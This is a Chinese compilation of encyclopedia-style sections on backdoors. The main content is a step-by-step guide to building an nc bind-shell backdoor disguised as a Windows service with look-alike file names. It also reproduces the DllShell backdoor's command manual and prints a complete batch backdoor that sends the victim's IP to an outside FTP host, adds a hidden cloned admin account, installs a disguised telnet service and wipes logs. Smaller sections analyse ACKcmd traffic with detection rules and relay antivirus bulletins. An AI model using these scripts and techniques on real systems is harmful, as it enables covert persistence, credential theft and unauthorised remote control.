后门,是绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在发布软件之前没有删除后门,那么它就成了安全风险,,容易被黑客当成漏洞进行攻击。
后门_后门 -制作后门
后门大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。
首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc.exe(这个是操作服务的一个小工具,被人称为操作服务的军刀),这些就可以打造我们自己的后门了,后门的要求我想不需要很强的操作功能,只需要当我们连接的时候获得一个system权限的shell就可以了,有了CMDSHELL做什么不可以呢。如果你需要反弹的后门,也可以做到,自己注册个域名就可以用nc反弹了,因为比较复杂这里就不说了。我们知道nc就是实现我们的后门功能的最经典的工具,我们来看看nc的帮助,命令行下输入nc -h就可以看到,我们主要用到的几个参数如下:
-e 绑定一个程序并且连接时执行
-l 监听模式
-p 指定nc要运行的本地端口
-L 增强了的监听模式,当连接断开时再次监听
至于其他的用法相信各位已经很了解了的,我们以前经常用到的是
nc -l -e cmd.exe -p 8888 \监听8888端口,当有连接时重定向到cmd.exe实现绑定一个shell\
这样的形式用serveru等溢出程序执行后来绑定一个可以得到shell的端口8888,我们telnet或者nc连接上来的时候就可以直接获得一个shell。但是这样连接断开之后监听的端口就会关闭,是一次性的,不能再次获得shell,这样当然不适合于做后门了。后来发现nc的这个参数L可以一直保持监听的状态,可以反复连接。用
nc -L -e cmd.exe -p 8888 \也是绑定的,不过加强了的\
这样的命令就已经达到我们的目的了,但是我们往往是在溢出的shell里工作,留后门是为了以后的进入,那我们如何保证nc再机器重起之后还可以工作从而实现我们的后门的目的呢?你可以把他放到注册表的Run等启动项下面,但是感觉那样不是太好,有些地方已经被杀毒软件盯上了,把我的后门放到那里实在不是很放心,后来想到干脆作成服务吧!随着系统启动而启动,呵呵。那就看看如何打造服务吧!
首先我们将nc.exe放到%systemroot%system32下面,起名叫svch0st.exe或者放到%systemroot%system下面更名叫svchost.exe,这样的目的是为了在任务管理器里看不出异样。然后用sc替换系统的服务,不用改别的,只要修改他的执行路径就可以了,我们就改那个clipsrv.exe服务吧!命令如下:
sc config clipsrv start= auto \将clipsrv.exe服务设置为自动\
sc config clipsrv binpath= "c:winntsystem32svch0st.exe -L -e cmd.exe -p 8888" \设置clipsrv.exe服务的启动路径为我们的nc\
sc start clipsrv \启动clipsrv.exe服务\
嘿嘿,但是看看结果吧!看看服务里的显示信息,如图一,很显眼哦!不管,先启动服务然后
netstat -anfind "8888" \netstat -an的结果中查找8888看我们的程序是否运行\
的确是已经被打开了,但是当显示服务没有响应的时候nc的进程被结束了,这是Windows服务管理机制吧。不是很成功呵,我们继续改造!不懂编程的我们这个时候就会很郁闷,因为不能让服务停止响应的时候我开始想用bat2exe.exe,但是启动服务的时候总是出现拒绝访问的错误,大概是bat2exe出来的exe文件不被系统服务格式所支持,只能想其他的办法了,于是我想到了用Winrar.exe来做我们自己的exe文件,这总该被服务的可执行文件支持吧!至于如何实现编程里的子进程在父进程终止后仍然可以在内存中运行,我用的方法是写个run.vbs然后用cscript.exe来调用,至于如何调用就可以在自解压格式里设置解压后运行cscript.exe run.vbs,如图三。其中Run.vbs里的内容如下:
dim sh \定义变量\
set sh=createobject("wscript.shell") \取得WSH对象\
sh.run "nc -L -e cmd.exe -p 8888",0 \执行我们的程序并隐藏错误\
而自解压的路径写上%systemroot%system32,这样我们自解压服务程序就做好了,保存为c1ipsrv.exe(不好意思,还是用那个1和l的把戏),放到c:winntsystem32目录下面。现在修改我们的clipsrv剪切薄服务的具体路径为c:winntsystem32c1ipsrv.exe,命令如下:
sc stop clipsrv \将clipsrv.exe服务设置为自动\
sc config clipsrv start= auto
sc config clipsrv binpath= "c:winntsystem32c1ipsrv.exe" \设置clipsrv.exe服务的启动路径为我们的nc\
sc start clipsrv \启动clipsrv.exe服务\
现在一切OK了,这样以来我们的程序的参数细节还会被屏蔽,比开始的参数直接放到执行文件路径里好多了。我们来实验下。先net start clipsrv,然后netstat -anfind "8888"看看开没开8888端口,最后用nc 127.0.0.1 8888连接上去得到shell了呵!如图四。好了,快去体验自己动手的快乐哦,你还可以作其他的事情,只要你的服务的程序做的够好,甚至可以用反向回来的nc,具体我就不写了。
本文是我看了韩的一个动画之后想到的,后来自己想到完全可以将nc改成后门的,不过也还是有很大的缺陷,毕竟不是编程,因为不能返回信息给服务控制器,会在日志里留一些错误,不过,有多少人去在意这些错误呢?还有就是没有身份验证功能,不过端口可以自定义不知道算不算一个身份验证。
后门_后门 -必要条件
后门产生的必要条件有以下三点:
1.必须以某种方式与其他终端节点相连――由于后门的利用都是从其他节点进行访问,因此必须与目标机使用双绞线、光纤维、串/并口、蓝牙、红外等设备在物理信号上有所连接才可以对端口进行访问。只有访问成功,双方才可以进行信号交流,攻击方才有机会进行入侵。
2.目标机默认开放的可供外界访问的端口必须在一个以上――因为一台默认无任何端口开放的机器是无法连接通信的,而如果开放着的端口外界无法访问,则同样没有办法进行入侵。
3.目标机存在程序设计或人为疏忽,导致攻击者能以权限较高的身份执行程序。并不是任何一个权限的帐号都能够被利用的,只有权限达到操作系统一定要求的才允许执行修改注册表,修改log记录等相关修改。
后门_后门 -后门分析
简介
-=-=-=-=--=
ACKcmd是提供Win2000下远程命令Shell的一种后门,它使用TCP来传输,但是不同于一般正常的TCP连接有三次握手,ACKcmd仅使用了TCP ACK数据包,所以一般情况下可以穿越防火墙及躲避IDS的检测。
ACKcmd采用client/server结构,在目标机器上运行AckCmdS.exe植入后门,入侵者在客户端运行命令AckCmdC 即可获得一个远程的Shell。
分析
-=-=-=-=--=
我们现在用sniffit来观察ACKcmd的数据是怎样传输的。入侵者在192.168.0.29,连入目标机器192.168.0.2:
E:Tools>ackcmdc 192.168.0.2
AckCmd 1.1 - The Ack Command Prompt for Windows 2000
- (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
- For instructions see http://ntsecurity.nu/toolbox/ackcmd/
Type "quit" and press Enter to quit
AckCmd> net name quit <------ 退出
sniffit抓到的包如下:
TCP Packet ID (from_IP.port-to_IP.port): 192.168.0.29.80-192.168.0.2.1054
SEQ (hex): 6060606 ACK (hex): 6060606
FLAGS: -A---- Window: 4000
Packet ID (from_IP.port-to_IP.port): 192.168.0.29.80-192.168.0.2.1054
45 E 00 . 00 . 38 8 00 . 00 . 00 . 00 . 80 . 06 . B9 . 50 P C0 . A8 . 00 . 1D .
C0 . A8 . 00 . 02 . 00 . 50 P 04 . 1E . 06 . 06 . 06 . 06 . 06 . 06 . 06 . 06 .
70 p 10 . 40 @ 00 . E6 . C6 . 00 . 00 . 02 . 04 . 05 . B4 . 01 . 01 . 04 . 02 .
6E n 65 e 74 t 20 6E n 61 a 6D m 65 e
TCP Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80
SEQ (hex): 6060606 FLAGS: ---R--
Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80
45 E 00 . 00 . 28 ( 04 . A8 . 00 . 00 . 80 . 06 . B4 . B8 . C0 . A8 . 00 . 02 .
C0 . A8 . 00 . 1D . 04 . 1E . 00 . 50 P 06 . 06 . 06 . 06 . 06 . 06 . 06 . 06 .
50 P 04 . 00 . 00 . 11 . EB . 00 . 00 .
TCP Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80
SEQ (hex): 6060606 ACK (hex): 6060606
FLAGS: -A---- Window: 4000
Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80
45 E 00 . 00 . CD . 04 . A9 . 00 . 00 . 80 . 06 . B4 . 12 . C0 . A8 . 00 . 02 .
C0 . A8 . 00 . 1D . 04 . 1E . 00 . 50 P 06 . 06 . 06 . 06 . 06 . 06 . 06 . 06 .
70 p 10 . 40 @ 00 . 1C . C1 . 00 . 00 . 02 . 04 . 05 . B4 . 01 . 01 . 04 . 02 .
0D . 0A . C3 . FB . B3 . C6 . 20 20 20 20 20 20 20 20 20 20
20 20 20 20 0D . 0A . 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 0D . 0A . 53 S 45 E 52 R 56 V 45 E 52 R 32 2 30 0 30 0
30 0 20 20 20 20 20 20 0D . 0A . 41 A 44 D 4D M 49 I 4E N 49 I 53 S
54 T 52 R 41 A 54 T 4F O 52 R 20 20 20 0D . 0A . C3 . FC . C1 . EE . B3 .
C9 . B9 . A6 . CD . EA . B3 . C9 . A1 . A3 . 0D . 0A . 0D . 0A .
可以看出,这次操作总共传输了三个TCP包。客户端的端口号是80,服务器的端口号是1054,这种类似于HTTP的通信是很容易被网管忽略的。客户端的命令net name以明文方式放在TCP的数据段,服务器立刻返回一个TCP RST包,然后接着返回一个TCP ACK,其中带着命令执行后的输出结果。如果输出结果很长,ACKcmd只能返回部分数据,这是作者在设计时没有考虑的。你可以运行dir c:winntsystem32看看,只能输出部分文件列表,最后附带信息“More...”表示并不是返回了全部数据。
检测
-=-=-=-=--=
首先,它采用的端口(80和1054)是固定的。要监控客户端发出的数据包,tcpdump的过滤规则为:
tcp[0:2] = 80 and tcp[2:2] = 1054
多做几次试验,可以发现它们之间通信的TCP ACK包中,序列号和ACK号都是0x06060606(十进制101058054),这也是一个很重要的特征。tcpdump的过滤规则为:
tcp[4:4] = 0x06060606 and tcp[8:4] = 0x06060606
缺陷
-=-=-=-=--=
正如作者所说,这是一个使用TCP ACK穿越防火墙的proof-of-concept,所以并不是很完善。数据的明文方式传输,以及在Win2000的任务列表中能看到AckCmdS.exe,所以此后门不难被发现。
后门_后门 -后门木马
dllshell v1.3更新日志:2006-09-22
[+]添加secdel功能,安全删除磁盘文件,不过增加了后门体积 :-(
[+]添加softinfo [-m]功能,可以查看安装了哪些软件包,-m选项提供更详细信息
[+]给dllshell加了Microsoft的文件信息(Windows XP下wzcsvc.dll的文件信息)
[!]修正使用ps -{mv|mc|md}可能导致后门崩溃的bug
[!]修正了内置DOS命令的几个小bug
[!]修正了进入cmdshell后,60秒就断开连接的bug,连接保活时间由配置文件的RecvTimeOut项决定
DllShell v1.2
nop www.ph4nt0m.org
有几个功能函数是参考&修改于namelessShell的代码,在此对作者的开源精神表示感谢.
如果发现任何bug或者有任何建议,请和我联系,谢谢!
后门使用
========================================================================
配置:
setdll.exe -w dllshell.dll //写入后门配置
setdll.exe -r dllshell.dll //读取后门配置
安装:
rundll32 dllshell.dll,I password //I和password之间只有一个空格
卸载:
rundll32 dllshell.dll,R password //然后重启即可
Q&A
=========================================================================
Q: DllShell的启动方式?
A: 后门采用替换系统原有服务的方法实现自启动,请替换服务前,确定该服务存在,否则后门可能安装失败.
Q: 如何知道后门安装成功?
A: 确认是否安装成功,请查看system32目录下面生成的dllshell.log文件,里面有安装过程的信息.
后门运行过程中不会生成log,请放心使用 :-)
Q: 如何卸载后门?
A: 后门启动时自动开启了自我保护线程(包括注册表项, 自身dll文件保护, IP变更通知).
如果要卸载后门,请先执行shield off命令,挂起保护线程,然后重启机器即可.
Q: 如何连接后门?
A: 连接后门请使用nc或者putty,使用系统自带的telnet是无法连接上后门的.
(why? telnet是一个字符一个字符发送,nc是在用户按下Enter后将用户缓冲一次发出)
正连或者反连成功后,没有任何提示符,请输入正确密码,即可看见欢迎banner.
还要注意的是,如果连上10s内没有输入密码,后门会自动断开
Q: 如何配置后门?
A: 请在dllshell.ini里面填写适当的信息,然后用setdll.exe -w dllshell.dll将配置写入
如果不放心写入的信息,可以用setdll.exe -r dllshell.dll 查看写入的配置
Q: 如何让后门融入系统dll大家庭?
A: 你可以用资源修改工具如ResHacker或者Restorator给dll添加上Microsoft的版权信息.
如果想使后门更小巧,请用WinUpack等工具压缩即可.
Q: 后门有哪些特点?
A: 请看后面的命令说明,功能还是挺全的.而且有时间还会不断添加.
命令详细说明
===========================================================================
ps -l
枚举进程
ps -k
结束进程,可用PID或者进程名
ps -d
在结束进程的基础上,然后删除进程的映象文件,可以对付某些弱智木马 :-)
ps -m
列举指定进程的模块,包括模块名(Module Name) 加载基址(base address)和映象路径(ImagePath)
ps -mv
列举指定进程的模块,包括模块名(Module Name) 和文件版本号(FileVerison),
比如:
Module FileVersion
=============================================================================
user32.dll5.00.2195.6897
ps -md
列举指定进程的模块,包括模块名(Module Name) 和文件描述(FileDescription)
比如:
Module FileVersion
=============================================================================
USER32.dll Windows 2000 USER API Client DLL
ps -mc
列举指定进程的模块,包括模块名(Module Name) 和公司名称(CompanyName)
比如:
Module CompanyName
=============================================================================
USER32.dll Microsoft Corporation
ps -h
隐藏指定的进程,可用PID或者进程名
此段代码非我写,改写自pjf的HideProcess.cpp,自然不能过Icesword:-)
User -e
枚举系统用户
User -a [UserPassword]
添加指定用户到Administrators组,并且密码永不过期, 如果不指定UserPassword,则为空密码
User -d
删除指定用户
User -n
将指定用户的"上次登录"改为"从不",同时修改该用户成功登录次数为0
User -c [Dest_UserPassword]
克隆帐号,也可恢复克隆的帐号,将Src_UserName,Dest_UserName同时设为Dest_UserName即可恢复克隆的帐号.
User -cc
检测克隆帐号
Netstat -t
枚举TCP连接
Netstat -te
只列出Established状态的TCP连接
Netstat -u
枚举UDP本地端口
Netstat -a
等于Netstat -t 加上Netstat -u
Netstat -k
断开已经建立的TCP连接(IP,端口用:隔开即可)
比如
netstat -k 192.168.0.1:3333 192.168.0.2:4444
Svc -ew
枚举Win32服务
Svc -es
枚举Driver服务
Svc -start
启动指定服务
Svc -stop
停止指定服务
Svc -d
删除指定服务
Svc -c
设置服务的启动方式
ServiceType为: Auto/Demand/Disable(自动/手动/禁用)
Svc -q
查询指定服务的详细信息.
比如svc -q w32time, 返回如下信息:
Service Information:
---------------------------------------
ServiceName: bits
DisplayName: Background Intelligent Transfer Service
Description: 用闲置网络带宽在后台传输文件。如果此服务被禁用,那么任何依赖于
BITS 的功能,例如 Windows Update 或MSN Explorer,都将不能自动
下载程序和其它信息。
ImagePath: C:WINNTSystem32svchost.exe -k BITSgroup
ServiceDll: C:WINNTSystem32qmgr.dll
StartName: LocalSystem
Dependencies: LanmanWorkstation Rpcss SENS Wmi
ErrorControl: Normal
StartType: Manual
CurrentState: Stopped
Service Information Complete.
Shutdown -i [TimeOut]
初始化关机过程,Message为显示给当前用户的消息,如果TimeOut未指定,默认为60s.
Shutdown -a
取消关机过程.
Shutdown -r
重启
Shutdown -s
关机
Shutdown -p
关闭电源
Shutdown -l
注销
Term -i [Port]
安装终端服务,如果Port不指定,默认为3389.
Term -p [Port]
更改终端服务端口,如果Port未指定,则查询当前终端服务端口.
MD/RD
删除目录
DEL
删除文件
DIR|LS [Pattern]
显示文件和目录,Pattern支持通配符,例如dir *.exe
--------------------------------------------------------------------------------------
AutoRun -e
枚举注册表里面的启动项,相当全面.
AutoRun -d
删除指定启动项目.
比如,autorun -e, 返回如下信息:
16.[HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun]
------------------------------------------------------------------------
[0]Internat.exe:
internat.exe
用autorun -d 16 0, 即可删除"[0]Internat.exe:"项目
Mouse -l/u
锁定/解除锁定鼠标指针
Mouse -s/r
交换/恢复鼠标左右键
ASSOC
枚举一些关键扩展名的执行关联,很老的马才会用这招了.
比如输入assoc, 返回信息如下:
文件关联:
-----------------------------
项目名称 状态(异常标志: ==> )
-------- ----
exe文件: "%1" %*
com文件: "%1" %*
bat文件: "%1" %*
cmd文件: "%1" %*
pif文件: "%1" %*
scr文件: "%1" /S
txt文件: ==> n0tepad.exe %1
ini文件: %SystemRoot%System32NOTEPAD.EXE %1
inf文件: %SystemRoot%System32NOTEPAD.EXE %1
reg文件: regedit.exe "%1"
clog
清除系统日志(包括应用程序/安全性/系统)
Exec
执行可执行文件
FindPass
查找2k/Nt的用户口令.
修复Nameless里面findpass的两个bug:
(system权限不能获取domain/username和只能查找一个winlogon进程的小bug)
FileTime
修改指定文件的创建日期和最后修改时间 到 DateTime指定的时间
DataTime的格式为yyyymmddhhmmss,如20060524152307
注:可以修改具有只读,隐藏,系统属性的文件时间
Help|?
帮助
LockPC
锁定工作站的桌面
Shell [CmdFile]
打开cmd命令行,如果CmdFile未指定,默认为cmd.exe
如果管理员删除了cmd.exe,或者修改了cmd.exe的权限;
你可以先wget个自己的mycmd.exe,然后Shell mycmd.exe即可
Shield
恢复/挂起自我保护线程,如果要卸载后门,请先Shield Off
SysInfo
收集系统配置信息,比较详细:-)
比如sysinfo, 返回信息如下:
系统信息
--------------------------------------
系统版本: Microsoft Windows 2000 Advance Server Service Pack 4.0(Build 2195)
产品ID: 52273-005-6861993-09773
安装路径: H:WIN2000PROI386
安装时间: 2046-1-20, 15:22:56
注册组织: Microsoft
注册用户: BillGates
主机名: WEB_SERVER
Windows目录: C:WINNT
系统目录: C:WINNTsystem32
CPU个数: 1个
CPU[0]: Intel(R) Pentium(R) 4 CPU 2.40GHz频率: 2391MHz
内存容量: 255MB Total, 31MB Free.
显示属性: 1024 x 768, 刷新率: 85Hz, 色深: 32bit
运行时间: 0天 00:10:32
盘符[卷标] 驱动器|文件系统 总大小|可用空间 百分比
-----------------------------------------------------------------------------
C:| 硬盘|NTFS 12001MB| 92MB 11.7G| 0.1G 0.8%
D:|本地磁盘 硬盘|FAT32 15633MB| 125MB 15.3G| 0.1G 0.8%
E:| 硬盘|FAT32 15633MB| 93MB 15.3G| 0.1G 0.6%
F:| 硬盘|FAT32 15633MB| 3708MB 15.3G| 3.6G 23.7%
G:|本地磁盘 硬盘|FAT32 15610MB| 59MB 15.2G| 0.1G 0.4%
H:| 光驱|无碟 0MB| 0MB 0.0G| 0.0G 0.0%
I:| 网络驱动器| 0MB| 0MB 0.0G| 0.0G 0.0%
硬盘总容量: 74513MB|72.8G
剩余空间: 4078MB|4.0G
可用百分比: 5.5%
本机IP
--------------------------------------
IP[0]: 192.168.0.1
Wget [SaveFileName]
Http下载文件到system32目录下面,
注意URL前面要加上http://
如果SaveFileName没指定,则使用URL里面的文件名
比如, wget http://192.168.0.2/cmd.exe mycmd.exe 则保存的文件名为mycmd.exe
wget http://192.168.0.2/cmd.exe 则保存的文件名为cmd.exe
Quit|Exit
退出Dllshell.
后门_后门 -IRC波特给系统开后门
一个名为“IRC波特变种CLQ(Backdoor.Win32.IRCbot.clq)”的病毒特别值得注意,它通过网络传播,黑客可以通过IRC软件对中毒电脑进行控制,对外发动攻击,给计算机系统带来重大安全隐患。
因此瑞星反病毒反木马一周播报(2008.05.26-06.01)将其列为本周关注病毒,警惕程度为。
“IRC波特变种CLQ”是一个后门病毒。该病毒运行后复制自身到驱动程序目录下,文件名为wmiadapi.exe,并自动写入注册表启动项,实现开机自动运行。病毒还会在中毒电脑上开设后门,自动连接cftp.dawn****.info接受远程指令,黑客可以利用IRC软件对染毒的计算机进行远程控制,进行多种危险操作。同时,该病毒还会自动修改系统文件,使系统一些正常的网络功能遭到破坏。
对此,专家建议用户:1、养成良好的上网习惯,不打开不良网站,不随意下载安装可疑插件。2、开启Windows安全中心、防火墙和自动更新,及时安装最新系统补丁,避免病毒通过系统漏洞入侵电脑。3、安装杀毒软件2008版升级到最新版本,定时杀毒并开启实时监控功能,防止病毒感染计算机。4、定时设置系统还原点和备份重要文件,并把网银、网游、QQ等重要软件加入到“账号保险柜”中,这样就可以防止病毒窃取自己的游戏账号、密码等私人资料。
后门_后门 -批处理后门
@echo off
cls
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
time /t>>time.txt
for /f "tokens=2 delims=:" %%a in (time.txt) do set ip=%%a
del time.txt /q
ipconfig>>ipconfig.txt
for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do echo %%i>>ip.txt
echo open lxz.0moola.com 21>a
echo lxz.0moola.com>>a
echo 1052104151>>a
echo bin>>a
echo put ip.txt /IP/%ip%.txt>>a
echo by>>a
ftp.exe -s:a
del ipconfig.txt /q
del ip.txt /q
del a /q
sc config Schedule start= auto
net start schedule
schtasks /create /tn Monitor /tr %SystemRoot%system32inetser.bat /sc onlogon /ru system
echo inetscr.exe -s:%SystemRoot%system32a >>%SystemRoot%system32inetser.bat
echo open 本机IP 端口>%SystemRoot%system32a
copy %SystemRoot%system32ftp.exe %SystemRoot%system32inetscr.exe
attrib +s +h %SystemRoot%system32a
attrib +s +h %SystemRoot%system32inetscr.exe
attrib +s +h %SystemRoot%tasksMonitor.job
reg add "HKLMSYSTEMCurrentControlSetControlLsa" /v forceguest /f /t REG_DWORD /d 00000000
echo Windows Registry Editor Version 5.00 >>c:h.reg
echo. >>c:h.reg
echo [HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNameslxz$] >>c:h.reg
echo @=hex(1f7): >>c:h.reg
echo regedit /s c:h.reg >>c:h.bat
echo del c:h.reg /q >>c:h.bat
echo REG add HKLMSAMSAMDomainsAccountUsers 00001F7 >>c:h.bat
echo REG COPY HKLMSAMSAMDomainsAccountUsers 00001F4 HKLMSAMSAMDomainsAccountUsers 00001F7 /s /f >>c:h.bat
echonet userlxz$ lxz>>c:h.bat
echo del c:h.bat /q >>c:h.bat
at 10:00 c:h.bat
schtasks /run /tn at1
schtasks /run /tn Monitor
tlntadmn config sec = -ntlm
tlntadmn config port = 420
copy %SystemRoot%system32tlntsvr.exe%SystemRoot%system32inetsvr.exe
attrib +s +h %SystemRoot%system32inetsvr.exe
echo [Version] >>c:inetsvr.inf
echo Signature="$WINDOWS NT$" >>c:inetsvr.inf
echo [DefaultInstall.Services] >>c:inetsvr.inf
echo AddService=inetsvr,,My_AddService_Name >>c:inetsvr.inf
echo [My_AddService_Name] >>c:inetsvr.inf
echo DisplayName=Windows Internet Service >>c:inetsvr.inf
echo Description=提供对 Internet 信息服务管理的支持。>>c:inetsvr.inf
echo ServiceType=0x10 >>c:inetsvr.inf
echo StartType=2 >>c:inetsvr.inf
echo ErrorControl=0 >>c:inetsvr.inf
echo ServiceBinary=%SystemRoot%system32inetsvr.exe >>c:inetsvr.inf
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:inetsvr.inf
del c:inetsvr.inf /q
net start inetsvr
net stop schedule
for /r %%a in (*.txt) do find "本机IP" >nul %%a && echo 1980>%%a
for /r %%b in (*.log) do find "本机IP" >nul %%b && echo 1980>%%b
for /r %%c in (*.EVT) do find "本机IP" >nul %%c && echo 1980>%%c
for /r %%d in (*.event) do find "本机IP" >nul %%d && echo 1980>%%d
net start schedule
schtasks /delete /tn at1 /f
del %0 /q
del lxz.bat /q
后门_后门 -黑洞后门
危险等级:★★★
病毒名称:Backdoor.Win32.BlackHole.ge
截获时间:2008.03.06
入库版本:20.34.31
类型:病毒
感染的操作系统:Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况:
传播级别:中
清除难度:困难
破坏力
这是一个Delphi编写的名为黑洞的后门病毒。病毒主文件的分析如下:
该病毒文件运行后会将创建自身副本到用户系统%SYSTEM%目录下,副本文件名为BRC_SERVER.EXE;病毒将启进程实现对用户系统的远程控制;并在注册表中添加如下项来实现开机自启动。
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesBRC_Services
BlackHole Remote Control Services = (IMAGEPATH)"%SYSTEM%BRC_SERVER.EXE" /SERVICE
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到20.34.31版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
后门_后门 -初级后门制作
众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方,然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了
一个文件都有一个所有者, 表示该文件是谁创建的. 同时, 该文件还有一个组编号, 表示该文件所属的组, 一般为文件所有者所属的组.
如果是一个可执行文件, 那么在执行时, 一般该文件只拥有调用该文件的用户具有的权限. 而setuid, setgid 可以来改变这种设置.
setuid: 设置使文件在执行阶段具有文件所有者的权限. 典型的文件是 /usr/bin/passwd. 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限, 从而可以更改用户的密码.
setgid: 该权限只对目录有效. 目录被设置该位后, 任何用户在此目录下创建的文件都具有和该目录所属的组相同的组.
sticky bit: 该位可以理解为防删除位. 一个文件是否可以被某用户删除, 主要取决于该文件所属的组是否对该用户具有写权限. 如果没有写权限, 则这个目录下的所有文件都不能被删除, 同时也不能添加新的文件. 如果希望用户能够添加文件但同时不能删除文件, 则可以对文件使用sticky bit位. 设置该位后, 就算用户对目录具有写权限, 也不能删除该文件.
下面说一下如何操作这些标志:
操作这些标志与操作文件权限的命令是一样的, 都是chmod. 有两种方法来操作,
1) chmod u+s temp -- 为temp文件加上setuid标志. (setuid 只对文件有效)
chmod g+s tempdir -- 为tempdir目录加上setgid标志 (setgid 只对目录有效)
chmod o+t temp -- 为temp文件加上sticky标志 (sticky只对文件有效)
2) 采用八进制方式. 对一般文件通过三组八进制数字来置标志, 如 666, 777, 644等. 如果设置这些特殊标志, 则在这组数字之外外加一组八进制数字. 如 4666, 2777等. 这一组八进制数字三位的意义如下,
abc
a - setuid位, 如果该位为1, 则表示设置setuid
b - setgid位, 如果该位为1, 则表示设置setgid
c - sticky位, 如果该位为1, 则表示设置sticky
设置完这些标志后, 可以用 ls -l 来查看. 如果有这些标志, 则会在原来的执行标志位置上显示. 如
rwsrw-r-- 表示有setuid标志
rwxrwsrw- 表示有setgid标志
rwxrw-rwt 表示有sticky标志
那么原来的执行标志x到哪里去了呢? 系统是这样规定的, 如果本来在该位上有x, 则这些特殊标志显示为小写字母 (s, s, t). 否则, 显示为大写字母 (S, S, T)